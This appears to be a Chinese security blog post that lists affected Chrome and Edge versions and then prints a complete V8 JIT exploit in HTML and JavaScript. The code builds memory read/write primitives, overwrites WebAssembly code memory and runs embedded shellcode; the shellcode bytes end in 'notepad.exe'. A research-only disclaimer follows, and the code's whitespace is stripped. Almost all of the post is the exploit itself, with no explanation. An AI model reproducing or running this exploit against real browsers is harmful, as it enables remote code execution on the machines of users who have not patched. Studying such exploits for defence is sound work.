影响范围
Google Chrome <= 89.0.4389.128
基于Chromium内核的Microsoft Edge <= 89.0.774.76
其他基于V8引擎的浏览器
html文件
<script>
functiongc(){
for(vari=0;i<0x80000;++i){
vara=newArrayBuffer();
}
}
letshellcode=[0xFC,0x48,0x83,0xE4,0xF0,0xE8,0xC0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,
0x56,0x48,0x31,0xD2,0x65,0x48,0x8B,0x52,0x60,0x48,0x8B,0x52,0x18,0x48,0x8B,0x52,
0x20,0x48,0x8B,0x72,0x50,0x48,0x0F,0xB7,0x4A,0x4A,0x4D,0x31,0xC9,0x48,0x31,0xC0,
0xAC,0x3C,0x61,0x7C,0x02,0x2C,0x20,0x41,0xC1,0xC9,0x0D,0x41,0x01,0xC1,0xE2,0xED,
0x52,0x41,0x51,0x48,0x8B,0x52,0x20,0x8B,0x42,0x3C,0x48,0x01,0xD0,0x8B,0x80,0x88,
0x00,0x00,0x00,0x48,0x85,0xC0,0x74,0x67,0x48,0x01,0xD0,0x50,0x8B,0x48,0x18,0x44,
0x8B,0x40,0x20,0x49,0x01,0xD0,0xE3,0x56,0x48,0xFF,0xC9,0x41,0x8B,0x34,0x88,0x48,
0x01,0xD6,0x4D,0x31,0xC9,0x48,0x31,0xC0,0xAC,0x41,0xC1,0xC9,0x0D,0x41,0x01,0xC1,
0x38,0xE0,0x75,0xF1,0x4C,0x03,0x4C,0x24,0x08,0x45,0x39,0xD1,0x75,0xD8,0x58,0x44,
0x8B,0x40,0x24,0x49,0x01,0xD0,0x66,0x41,0x8B,0x0C,0x48,0x44,0x8B,0x40,0x1C,0x49,
0x01,0xD0,0x41,0x8B,0x04,0x88,0x48,0x01,0xD0,0x41,0x58,0x41,0x58,0x5E,0x59,0x5A,
0x41,0x58,0x41,0x59,0x41,0x5A,0x48,0x83,0xEC,0x20,0x41,0x52,0xFF,0xE0,0x58,0x41,
0x59,0x5A,0x48,0x8B,0x12,0xE9,0x57,0xFF,0xFF,0xFF,0x5D,0x48,0xBA,0x01,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x8D,0x01,0x01,0x00,0x00,0x41,0xBA,0x31,0x8B,
0x6F,0x87,0xFF,0xD5,0xBB,0xF0,0xB5,0xA2,0x56,0x41,0xBA,0xA6,0x95,0xBD,0x9D,0xFF,
0xD5,0x48,0x83,0xC4,0x28,0x3C,0x06,0x7C,0x0A,0x80,0xFB,0xE0,0x75,0x05,0xBB,0x47,
0x13,0x72,0x6F,0x6A,0x00,0x59,0x41,0x89,0xDA,0xFF,0xD5,0x6E,0x6F,0x74,0x65,0x70,
0x61,0x64,0x2E,0x65,0x78,0x65,0x00];
varwasmCode=newUint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
varwasmModule=newWebAssembly.Module(wasmCode);
varwasmInstance=newWebAssembly.Instance(wasmModule);
varmain=wasmInstance.exports.main;
varbf=newArrayBuffer(8);
varbfView=newDataView(bf);
functionfLow(f){
bfView.setFloat64(0,f,true);
return(bfView.getUint32(0,true));
}
functionfHi(f){
bfView.setFloat64(0,f,true);
return(bfView.getUint32(4,true))
}
functioni2f(low,hi){
bfView.setUint32(0,low,true);
bfView.setUint32(4,hi,true);
returnbfView.getFloat64(0,true);
}
functionf2big(f){
bfView.setFloat64(0,f,true);
returnbfView.getBigUint64(0,true);
}
functionbig2f(b){
bfView.setBigUint64(0,b,true);
returnbfView.getFloat64(0,true);
}
classLeakArrayBufferextendsArrayBuffer{
constructor(size){
super(size);
this.slot=0xb33f;
}
}
functionfoo(a){
letx=-1;
if(a)x=0xFFFFFFFF;
vararr=newArray(Math.sign(0-Math.max(0,x,-1)));
arr.shift();
letlocal_arr=Array(2);
local_arr[0]=5.1;//4014666666666666
letbuff=newLeakArrayBuffer(0x1000);//byteLength idx=8
arr[0]=0x1122;
return[arr,local_arr,buff];
}
for(vari=0;i<0x10000;++i)
foo(false);
gc();gc();
[corrput_arr,rwarr,corrupt_buff]=foo(true);
corrput_arr[12]=0x22444;
deletecorrput_arr;
functionsetbackingStore(hi,low){
rwarr[4]=i2f(fLow(rwarr[4]),hi);
rwarr[5]=i2f(low,fHi(rwarr[5]));
}
functionleakObjLow(o){
corrupt_buff.slot=o;
return(fLow(rwarr[9])-1);
}
letcorrupt_view=newDataView(corrupt_buff);
letcorrupt_buffer_ptr_low=leakObjLow(corrupt_buff);
letidx0Addr=corrupt_buffer_ptr_low-0x10;
letbaseAddr=(corrupt_buffer_ptr_low&0xffff0000)-((corrupt_buffer_ptr_low&0xffff0000)%0x40000)+0x40000;
letdelta=baseAddr+0x1c-idx0Addr;
if((delta%8)==0){
letbaseIdx=delta/8;
this.base=fLow(rwarr[baseIdx]);
}else{
letbaseIdx=((delta-(delta%8))/8);
this.base=fHi(rwarr[baseIdx]);
}
letwasmInsAddr=leakObjLow(wasmInstance);
setbackingStore(wasmInsAddr,this.base);
letcode_entry=corrupt_view.getFloat64(13*8,true);
setbackingStore(fLow(code_entry),fHi(code_entry));
for(leti=0;i<shellcode.length;i++){
corrupt_view.setUint8(i,shellcode[i]);
}
main();
</script>
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论